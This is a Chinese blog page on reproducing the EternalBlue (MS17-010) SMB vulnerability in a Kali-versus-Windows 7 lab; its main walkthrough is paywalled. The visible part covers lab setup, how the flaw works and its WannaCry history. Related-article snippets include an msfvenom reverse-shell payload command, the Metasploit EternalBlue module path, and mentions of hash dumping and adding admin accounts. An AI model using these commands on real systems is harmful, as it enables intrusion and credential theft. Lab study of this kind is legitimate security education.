Windows系统漏洞检测与漏洞利用以及修复(永恒之蓝ms17-010)

已于 2023-11-22 17:53:49 修改
阅读量2.5k 收藏 24
点赞数 7
分类专栏: 漏洞复现 文章标签: windows 网络 安全
于 2023-04-25 09:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48539059/article/details/130352833
版权

前言

●环境:

攻击机:Linux kali(IP:192.168.107.129)
靶机:Windows 7 Enterprise (x64)(IP:192.168.107.143)
实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的!

●永恒之蓝介绍:

永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。

●漏洞原理:

永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

●影响版本:

目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista

了解本专栏 订阅专栏 解锁全文 超级会员免费看
gaynell
关注
  • 7
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
永恒之漏洞复现(详细版),网络安全工程师必备知识
2201_75863152的博客
04-11 552
1.检查防火墙是否关闭2.检查远程连接是否开启3.卸载更新的补丁至下面三个即可(没安装vmware tools)
永恒之ms17_010漏洞复现
m0_73005107的博客
11-28 1410
永恒之漏洞复现
ms17-010(永恒之漏洞复现与处理
最新发布
2401_84972648的博客
05-17 582
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
MS17-010永恒之-漏洞利用+修复方法
WEB渗透测试 从入门到萌新
04-21 8113
系列文章目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 系列文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的
kail下使用exploit/windows/smb/ms17_010_eternalblue攻击win2k7练习meterpreter
yanyi3271的博客
10-30 2382
1、use exploit/windows/smb/ms17_010_eternalblue options和payload设置如下 2、攻击成功 3、截屏 meterpreter的screenshot命令可以获取活动用户的桌面截屏保存到相应目录 4、sysinfo 这个命令可以获取系统运行的平台 5、获取靶机上的账户密码哈希值 传递哈希值(失败) 6、Meterpreter跳转,并保...
ms17-010 永恒之
qq_62803993的博客
01-12 3466
什么是永恒之 永恒之(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复
MS17-010永恒之漏洞复现(手把手教程,超细!)
qq_46089119的博客
02-06 6444
ms17-010漏洞利用(本地环境复现)
网安永恒之MS17-010检测工具.zip
03-01
永恒之,MS17-010,漏洞检测工具
永恒之ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。...
Windows漏洞 MS17-010 / EternalBlue(永恒之)工具-易语言
06-11
MS17-010 / EternalBlue(永恒之漏洞 检测工具 百度百科: https://baike.baidu.com/item/永恒之 本源码 无调用 任何模块 测试环境: Microsoft Windows XP x86 Microsoft Windows Server 2003 x86 漏洞涉及 ...
永恒之检测工具MS17-010漏洞扫描工具 (全网段)
10-05
MS17-010漏洞扫描工具,在公司,或网吧,机器多的可以直接扫描 可直接输入指定的服务器,或客机扫描
永恒之漏洞 ms17_010 详解
qq_45953122的博客
10-25 4770
永恒之(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复
永恒之漏洞复现
m0_75178803的博客
06-11 401
(控制面板——编辑组——管理工具编辑组策略——本地计算机策略——计算机配置——windows设置——安全设置——本地策略——安全选项)终端输入nmap -sP 对在192.168.75.xxx网段下的所有电脑进行简单的ping扫描(不进行端口扫描)终端输入nmap -p,通过扫描端口,用端口的是否启用来获取靶机ip。创建新的管理员账户,账户名123,密码123(在shell控制台下)查看目标靶机的本地用户(在目标主机的shell控制台下)获取靶机的本地用户的密码(在meterpreter下)
Windows网络服务渗透测试实战MS17-010漏洞复现
c_lanxiaofang的博客
05-16 3331
一、实验项目名称 Windows网络服务渗透测试实战MS17-010漏洞复现 二、实验目的及要求 熟悉Metasploit终端的使用方法; 掌握对MS17-010漏洞攻击的方法。 三、复现步骤(附加文字说明加截图) 1、NAT模式 Kali-Linux :192.168.232.141 Windows 7: 192.168.232.142 2、查看ip kali:ip a win7:ipconfig 3、重启网卡 service networking restart 4、测试是否连通 k
永恒之漏洞复现(ms17-010)
热门推荐
good good study
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
永恒之(ms17_010)漏洞复现
m0_50317371的博客
12-08 676
一、永恒之简介 ​永恒之是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之”工具,“永恒之利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代
Windows版Nessus漏洞扫描器安装与使用
xunhuanmao的博客
07-31 1万+
Nessus漏洞扫描器安装与破解详细教程。
永恒之ms17-010虚拟机
05-10
永恒之是一种利用Windows操作系统中的漏洞进行攻击的恶意软件,而MS17-010则是Windows操作系统中的一个漏洞,被恶意软件利用后可以导致系统被攻击者控制。为了学习和测试永恒之的攻击和防御,可以使用一个搭载了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gaynell

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值